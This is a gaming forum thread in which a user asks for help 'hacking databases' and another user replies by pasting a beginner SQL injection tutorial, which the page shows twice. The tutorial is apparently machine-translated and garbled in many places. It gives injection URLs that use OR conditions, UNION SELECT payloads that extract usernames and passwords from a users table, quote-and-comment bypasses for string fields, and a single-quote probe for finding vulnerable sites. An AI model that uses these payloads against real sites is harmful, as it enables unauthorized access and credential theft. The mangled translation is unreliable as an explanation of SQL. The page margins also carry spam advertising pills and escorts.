255
users online
News
Journals
Articles
Forums
Tutorials
Events
Polls
Albums
Videos
E-mail Address
Password
Cookie
Forgot password?
CF3 Migrate
Register
Login
sql inject
by
Halidith
•
5 Sep 2012, 07:52
•
Journals
Anyone who knows something about sql inject, or hacking databases?
please /q Halidith on #gamehosting or pm on cf
Comments
6
▼
Exc1te
5 Sep 2012, 09:12
anyone with little understanding of the PHP/Mysql combo does
▼
Reb
5 Sep 2012, 09:21
lol once it was necessary just to put a "; drop database" into a registration field.. but it's overpassed now :D
▼
ENSJQM
5 Sep 2012, 12:16
why dont just ask here?
▼
Blindi
5 Sep 2012, 12:40
thought this was about squall
▼
etviper
5 Sep 2012, 12:59
i know who know :
GOOGLE
▼
Baviaantje
5 Sep 2012, 15:36
show hidden text
SQL Injection for beginners
-By: Mark IJbema (Vandread) -
-Purpose of this manual
The purpose of this manual is to provide for beginners SQL injection clearly
make.
For questions and comments:
[email protected]
Conventions
In a url should all braces uri-encoded (% .. characters)
, and the braces itself is not to be used, but for the
legibility is that this tutorial is not done (though do a
hope browsers do this automatically for all but the '=' char behind, as
that you just do yourself (% 3D) then it probably works though)
-What is SQL
SQL is a language for database access. There are both commands to things
to ask if things change. Things request is done as follows:
SELECT <kolommen>
FROM <tabellen>
WHERE <voorwaarden>
So for example:
SELECT name, description, price
FROM products
WHERE name = '128MB RAM '
The price which you requested on 128MB RAM. However, since you often only a
would result, and a name is not necessarily unique, one often unique
IDs. So if the ID of 128MB RAM instance is 12, sees the query (so hot
a selection in SQL) is as follows:
SELECT name, description, price
FROM products
WHERE id = 12
Furthermore, you also update and the like to modify, but it performs
too far here to go deeper.
-Using SQL from websites
Suppose you have a webpage to a product display data. You get
Now as a parameter the id of the product. The URL of the page looks like
follows:
http://www.example.com/product.php?id=12
then in the PHP code the id in the query is processed. The id is in $ id, and
then the query is as follows:
$ Query = "SELECT name, description, price FROM products WHERE id = $ id"
which as $ id 12 has resulted in:
SELECT name, description, price FROM products WHERE id = 12
what a pretty valid query is.Maar people forgot to check if $ id a
number, and if we are in the query 12 is replaced by something else that is on the
instead of 12 stuck. So for example:
http://www.example.com/product.php?id=onzin
supplies
SELECT name, description, price FROM products WHERE id = nonsense
on, and probably you get an error like "crap is not a number". But you
can also supplement the SQL, for example:
http://www.example.com/product.php?id
= {666666 OR id = 13}
yields:
SELECT name, description, price FROM products WHERE id = 666666 OR id = 13
and now you get to see product 13 (assuming no valid 666666
id's).
-Union
One of the most important techniques in SQL injection is the UNION operator. In
the previous example, you can customize what you want, but you get as output
Always a name, a description and a price. This is usually not
interesting. Suppose that in the same database also lists usernames,
ids and passwords are, then you really want to have.
You can do this with the following query:
SELECT username, password FROM users WHERE id = 1
exists in the UNION operator to SQL queries to stick together, provided that the
number of columns of the two queries are equal and the types of the results are also
are equal in pairs (string, int, etc.). So to the previous query to the
product query must add an additional column to integer (its
assuming that the price as integer in the database). The query with the union
there will then be seen as follows:
SELECT name, description, price FROM products WHERE id = 12
UNION
SELECT username, password, id FROM users WHERE id = 1
by now for 12 a nonexistent ID to use the first query is empty, and
is the result only of the second query. So:
SELECT name, description, price FROM products WHERE id = 666666
UNION
SELECT username, password, id FROM users WHERE id = 1
We obtain this query using the following URL:
http://www.example.com/product.php?id
= {666666 UNION SELECT username,
password, id FROM users WHERE id = 1}
So we can read a user's password. If you all
user password and username wish, you can write a script
this page retrieves all IDs, page parsed, and in a
nicely format the output shows.
-Strings
Often instead of IDs or other numbers also strings
given, for example:
http://www.example.com/listusers?name=mark
Displays the list of all users who are called marks. This looks
something like internal
SELECT ... FROM ... WHERE ... AND name = 'highlight' AND ...
Now we do not want all users with name 'mark', but with
password 'password'. So we want to make the following query:
SELECT ... FROM ...
WHERE ... AND name = 'nonsense' OR password = 'password' AND ...
What we get with the following url:
http://www.example.com/listusers?name
= {nonsense 'OR password =' password}
Sometimes it is convenient to ignore the last part, by a
comments to make, the query becomes:
SELECT ... FROM ...
WHERE ... AND name = 'nonsense' OR password = 'wachtwoord'-AND ...
And the url:
http://www.example.com/listusers?name
= {nonsense 'OR password =' wachtwoord'-}
-Test if a site is susceptible to SQL Injection
The simplest way to test whether a site is vulnerable to sql
injection by a single quotje in the query string to add in
a variable. If this is a database error occurs the site
vulnerable. If that does not occur, it may still be that the site
vulnerable, but it is probably magic_quotes or something
similar products, which. In that case, you do SQL injection, but you can
thereby no use quotes.
-Closing
These are roughly have the basics, but there is a lot
more to do, but a lot depends on your own creativity
and the most useful things are often dependent server (from
MS SQLServer instance you can (depending on how it is
configured) sending emails. I hope this is enough to get you
get started, the rest should work with enough creativity in
combination with scripting skills (to automate things). Also
interesting database specific properties are tables showing the
meta-information condition (table names, column names, etc.).
-Sources
http://www.hackinthebox.org/print.php?sid=6899
Here u go!
Back to top
Recent
Events
Polls
Thompson or MP40?
Thompson
35.8 %
(19 votes)
MP40
64.2 %
(34 votes)
How to Download Ringtone iPhone
FarahHelga
Fildena 100 Mg | Long Lasting ED Pill
lifesavingrx
Escorts in Delhi
sunita01
ET Anniversary Winter League
Sebhes
Merry Christmas Crossfire
ohurcool
Prosoma 500 Mg Tablet Can Help you Get Rid of Muscle Pain
amytriots
Download ET
News
+
ET Anniversary LAN Announcement
Sebhes
27
ET Anniversary Winter League
Sebhes
1
Merry Christmas Crossfire
ohurcool
5
ET Anniversary Fall Cup Play Offs
Sebhes
1
ET Anniversary Fall Cup Groups & Schedule
Sebhes
14
RTCW: Tavern Rush - Purmerend 2023
Graecos
4
Journals
+
ET on steam
overdrive
26
All good things must come to an end?
TosspoT
592
How to Download Ringtone iPhone
FarahHelga
0
ET Anniversary Fall Cup 3on3 Qualifiers
Sebhes
5
Script to download private messages
Kimi
5
Vote Pansy for Esports Award
TosspoT
12
Graphic designer
Sebhes
2
cheater confession journal
mama
33
4 years later...all good things must actually come to an end
TosspoT
119
The dust is starting to settle in
Sebhes
13
3on3 adlernest
andyouok
1
fix this site please
rezta
11
Threads
Public Servers
dorian1
7
Frag Movie Database
fumble
294
Fildena 100 Mg | Long Lasting ED Pill
lifesavingrx
0
Escorts in Delhi
sunita01
1
Looking for old FM
ght
11
ET in 4k despite windows scaling at 200%?
Patrick_70
1
Онлайн игры
hilomod
0
australian cheater
pengirl
9
cybergames old servers
barbiekiller
12
objtrack.lua script
dorian1
8
infected event
barbiekiller
0
new file data base for wolfenstein
barbiekiller
8
Tutorials
+
How to Play ET in 2022
ohurcool
148
New trick jump tutorial series!
donkanator
2
RTCW Study - Spreadscale
donkanator
10
Tech3 Demo API - 0.1.1
Kimi
9
Videos
Albums
3er Open
by
HaoKakao
10
ET Reborn LAN 2015
by
timbolina
1112
LAN PICS
by
Pansy
35
Golden Pumpkins
by
Nizou
Tavern Rush Ghent 2022 - RTCW LAN...
by
Nizou
Enigma Decrypted
by
Nizou
GOOGLE
-By: Mark IJbema (Vandread) -
-Purpose of this manual
The purpose of this manual is to provide for beginners SQL injection clearly
make.
For questions and comments: [email protected]
Conventions
In a url should all braces uri-encoded (% .. characters)
, and the braces itself is not to be used, but for the
legibility is that this tutorial is not done (though do a
hope browsers do this automatically for all but the '=' char behind, as
that you just do yourself (% 3D) then it probably works though)
-What is SQL
SQL is a language for database access. There are both commands to things
to ask if things change. Things request is done as follows:
SELECT <kolommen>
FROM <tabellen>
WHERE <voorwaarden>
So for example:
SELECT name, description, price
FROM products
WHERE name = '128MB RAM '
The price which you requested on 128MB RAM. However, since you often only a
would result, and a name is not necessarily unique, one often unique
IDs. So if the ID of 128MB RAM instance is 12, sees the query (so hot
a selection in SQL) is as follows:
SELECT name, description, price
FROM products
WHERE id = 12
Furthermore, you also update and the like to modify, but it performs
too far here to go deeper.
-Using SQL from websites
Suppose you have a webpage to a product display data. You get
Now as a parameter the id of the product. The URL of the page looks like
follows:
http://www.example.com/product.php?id=12
then in the PHP code the id in the query is processed. The id is in $ id, and
then the query is as follows:
$ Query = "SELECT name, description, price FROM products WHERE id = $ id"
which as $ id 12 has resulted in:
SELECT name, description, price FROM products WHERE id = 12
what a pretty valid query is.Maar people forgot to check if $ id a
number, and if we are in the query 12 is replaced by something else that is on the
instead of 12 stuck. So for example:
http://www.example.com/product.php?id=onzin
supplies
SELECT name, description, price FROM products WHERE id = nonsense
on, and probably you get an error like "crap is not a number". But you
can also supplement the SQL, for example:
http://www.example.com/product.php?id = {666666 OR id = 13}
yields:
SELECT name, description, price FROM products WHERE id = 666666 OR id = 13
and now you get to see product 13 (assuming no valid 666666
id's).
-Union
One of the most important techniques in SQL injection is the UNION operator. In
the previous example, you can customize what you want, but you get as output
Always a name, a description and a price. This is usually not
interesting. Suppose that in the same database also lists usernames,
ids and passwords are, then you really want to have.
You can do this with the following query:
SELECT username, password FROM users WHERE id = 1
exists in the UNION operator to SQL queries to stick together, provided that the
number of columns of the two queries are equal and the types of the results are also
are equal in pairs (string, int, etc.). So to the previous query to the
product query must add an additional column to integer (its
assuming that the price as integer in the database). The query with the union
there will then be seen as follows:
SELECT name, description, price FROM products WHERE id = 12
UNION
SELECT username, password, id FROM users WHERE id = 1
by now for 12 a nonexistent ID to use the first query is empty, and
is the result only of the second query. So:
SELECT name, description, price FROM products WHERE id = 666666
UNION
SELECT username, password, id FROM users WHERE id = 1
We obtain this query using the following URL:
http://www.example.com/product.php?id = {666666 UNION SELECT username,
password, id FROM users WHERE id = 1}
So we can read a user's password. If you all
user password and username wish, you can write a script
this page retrieves all IDs, page parsed, and in a
nicely format the output shows.
-Strings
Often instead of IDs or other numbers also strings
given, for example:
http://www.example.com/listusers?name=mark
Displays the list of all users who are called marks. This looks
something like internal
SELECT ... FROM ... WHERE ... AND name = 'highlight' AND ...
Now we do not want all users with name 'mark', but with
password 'password'. So we want to make the following query:
SELECT ... FROM ...
WHERE ... AND name = 'nonsense' OR password = 'password' AND ...
What we get with the following url:
http://www.example.com/listusers?name = {nonsense 'OR password =' password}
Sometimes it is convenient to ignore the last part, by a
comments to make, the query becomes:
SELECT ... FROM ...
WHERE ... AND name = 'nonsense' OR password = 'wachtwoord'-AND ...
And the url:
http://www.example.com/listusers?name = {nonsense 'OR password =' wachtwoord'-}
-Test if a site is susceptible to SQL Injection
The simplest way to test whether a site is vulnerable to sql
injection by a single quotje in the query string to add in
a variable. If this is a database error occurs the site
vulnerable. If that does not occur, it may still be that the site
vulnerable, but it is probably magic_quotes or something
similar products, which. In that case, you do SQL injection, but you can
thereby no use quotes.
-Closing
These are roughly have the basics, but there is a lot
more to do, but a lot depends on your own creativity
and the most useful things are often dependent server (from
MS SQLServer instance you can (depending on how it is
configured) sending emails. I hope this is enough to get you
get started, the rest should work with enough creativity in
combination with scripting skills (to automate things). Also
interesting database specific properties are tables showing the
meta-information condition (table names, column names, etc.).
-Sources
http://www.hackinthebox.org/print.php?sid=6899
Here u go!